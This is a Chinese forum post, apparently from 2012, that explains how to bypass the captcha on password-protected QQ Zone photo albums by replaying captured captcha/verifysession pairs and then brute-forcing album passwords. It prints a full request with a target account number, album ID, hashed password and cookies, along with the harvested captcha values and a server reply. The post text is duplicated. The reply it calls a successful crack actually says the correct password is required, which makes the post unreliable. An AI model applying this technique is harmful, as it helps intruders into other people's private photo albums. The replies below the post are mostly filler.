edit_note帖子
26
stars积分
1,820
event加入
2012-03-13
电脑网络
破解qq空间相册密码绕过验证码的方法
schedule发表于 2012-03-19 13:49:00
visibility查看 10,637
chat_bubble回复 765
#1 楼主
01.破解qq空间相册密码绕过验证码的方法
02.只是提供一种思路现在相册加了验证码所以以前我写的qq相册密码破解工具已经没用了今天我想到这个方法就是绕过验证码进行破解的
03.看演示
04.GET /cgi-bin/common/cgi_view_album?uin=215927967&refer=qzone&albumid=118370506&password=8277e0910d750195b448797616e091ad&verifycode=6em3 HTTP/1.1
05.Accept: */*
06.Accept-Language: zh-cn
07.Referer: http://photo.qq.com/proxy.html
08.If-Modified-Since: 0
09.Accept-Encoding: gzip, deflate
10.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1; .net CLR 2.0.50727)
11.Host: photo.qq.com
12.Connection: Keep-Alive
13.Cookie: pvid=52343013; flv=9.0; uin_cookie=104705883; euin_cookie=AQAYPyD/qOQasqBS3xpgl2mx65lA5T0103B3GAAAAAGLrApKgStQ07DCCN40kdjHcKYiGw==; zzpanelkey=; zzpaneluin=; qqmusic_fromtag=6; beVip=0; jump=4; verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000
14.这个是向服务器提交的数据
15.215927967这个是qq号码
16.118370506这个是相册ID值
17.在相册也可看到的
18.8277e0910d750195b448797616e091ad
19.这个是MD5加密的密码
20.verifycode=6em3
21.这个就是验证码了
22.看服务器给我们的验证码返回了什么值
23.verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000
24.研究不出是什么方式加密的
25.肯定也用了MD5吧
26.我用的是另一种方式
27.我记录下几组验证玛和值就不可以进行破解了吗
28.用工具向服务器提交我们自定义的数据和Cookie的值当然是验证码的值了
29.hsmr 值:fadce5ed661a163353a675077362dca2860767ed9af299b83ad80a628523b04b
30.ung5 值:a68cb3278e5a239ddcbf7bcfbd52b51e62308a01310960e01be3f5307281132c
31.9upg cc1105f8b1741c696fbf2df5b73b024561b5aa1b03da4264409a2924075b6b9e
32.yfhx d3a35df6f3d612d27130d90d2d098597403e0fe7a16b8a6195c6c901e472696f
33.yrkv 9b570ef0e772743724bd853fde8e56226af5f9456dad48a75f7d03f5a29fb6dc
34.可以了
35.我用asp写了个随机返回验证码和值的网页
36.然后用工具获取这些值再向腾讯的服务器提交我们自定义好的数据
37.我把上面收集好的验证码和值添加到数据库里了
38.然后用网页进行随机输出
39.看我写的工具
40.代码就不做详细的解释了
41.呵呵
42.看返回了什么
43.HTTP/1.1 200 OK
44.Date: Mon, 05 Nov 2007 07:49:19 GMT
45.Server: Apache
46.Cache-Control: max-age=0
47.Expires: Mon, 05 Nov 2007 07:49:19 GMT
48.Connection: close
49.Transfer-Encoding: chunked
50.Content-Type: text/xml
51.28
52.<?xml version=“1.0“ encoding=“gb2312“?>
53.9
54.<return>
55.11
56.<value>0</value>
57.48
58.<msg><!*CDATA*您所要查看的相册需要给出正确的密码才能访问!(805)**></msg>
59.a
60.</return>
61.成功破解了
62.只要我们收集的验证码够多就可以进行暴力破解了
02.只是提供一种思路现在相册加了验证码所以以前我写的qq相册密码破解工具已经没用了今天我想到这个方法就是绕过验证码进行破解的
03.看演示
04.GET /cgi-bin/common/cgi_view_album?uin=215927967&refer=qzone&albumid=118370506&password=8277e0910d750195b448797616e091ad&verifycode=6em3 HTTP/1.1
05.Accept: */*
06.Accept-Language: zh-cn
07.Referer: http://photo.qq.com/proxy.html
08.If-Modified-Since: 0
09.Accept-Encoding: gzip, deflate
10.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1; .net CLR 2.0.50727)
11.Host: photo.qq.com
12.Connection: Keep-Alive
13.Cookie: pvid=52343013; flv=9.0; uin_cookie=104705883; euin_cookie=AQAYPyD/qOQasqBS3xpgl2mx65lA5T0103B3GAAAAAGLrApKgStQ07DCCN40kdjHcKYiGw==; zzpanelkey=; zzpaneluin=; qqmusic_fromtag=6; beVip=0; jump=4; verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000
14.这个是向服务器提交的数据
15.215927967这个是qq号码
16.118370506这个是相册ID值
17.在相册也可看到的
18.8277e0910d750195b448797616e091ad
19.这个是MD5加密的密码
20.verifycode=6em3
21.这个就是验证码了
22.看服务器给我们的验证码返回了什么值
23.verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000
24.研究不出是什么方式加密的
25.肯定也用了MD5吧
26.我用的是另一种方式
27.我记录下几组验证玛和值就不可以进行破解了吗
28.用工具向服务器提交我们自定义的数据和Cookie的值当然是验证码的值了
29.hsmr 值:fadce5ed661a163353a675077362dca2860767ed9af299b83ad80a628523b04b
30.ung5 值:a68cb3278e5a239ddcbf7bcfbd52b51e62308a01310960e01be3f5307281132c
31.9upg cc1105f8b1741c696fbf2df5b73b024561b5aa1b03da4264409a2924075b6b9e
32.yfhx d3a35df6f3d612d27130d90d2d098597403e0fe7a16b8a6195c6c901e472696f
33.yrkv 9b570ef0e772743724bd853fde8e56226af5f9456dad48a75f7d03f5a29fb6dc
34.可以了
35.我用asp写了个随机返回验证码和值的网页
36.然后用工具获取这些值再向腾讯的服务器提交我们自定义好的数据
37.我把上面收集好的验证码和值添加到数据库里了
38.然后用网页进行随机输出
39.看我写的工具
40.代码就不做详细的解释了
41.呵呵
42.看返回了什么
43.HTTP/1.1 200 OK
44.Date: Mon, 05 Nov 2007 07:49:19 GMT
45.Server: Apache
46.Cache-Control: max-age=0
47.Expires: Mon, 05 Nov 2007 07:49:19 GMT
48.Connection: close
49.Transfer-Encoding: chunked
50.Content-Type: text/xml
51.28
52.<?xml version=“1.0“ encoding=“gb2312“?>
53.9
54.<return>
55.11
56.<value>0</value>
57.48
58.<msg><!*CDATA*您所要查看的相册需要给出正确的密码才能访问!(805)**></msg>
59.a
60.</return>
61.成功破解了
62.只要我们收集的验证码够多就可以进行暴力破解了
全部回复 (765)
2015-11-11 16:11:00
#722
hbbbb
2015-11-11 20:11:00
#723
哦哦哦。呵呵
2015-11-12 15:35:00
#724
斤斤计较
2015-11-15 18:42:00
#725
楼能联系
2016-01-18 12:56:00
#726
我想要
2016-01-19 13:03:00
#727
看看开会
2016-01-21 07:07:00
#728
受骗了
2016-01-21 07:11:00
#729
看不懂,怎么实验
2016-01-21 07:17:00
#730
28怎么说?在哪输值
2016-01-27 11:06:00
#731
他9哦哦
2016-01-27 19:05:00
#732
fgbgbg
2016-02-02 15:19:00
#733
吧
2016-02-07 10:24:00
#734
E
2016-02-10 12:28:00
#735
么
2016-04-01 09:04:00
#736
bhbc
2016-04-05 21:53:00
#737
龙
2016-04-06 08:48:00
#738
Jdjdjdjdndn
2016-04-12 23:15:00
#739
3
2016-04-14 00:04:00
#740
f
2016-04-16 19:27:00
#741
........
登录 后才能回复
flag举报帖子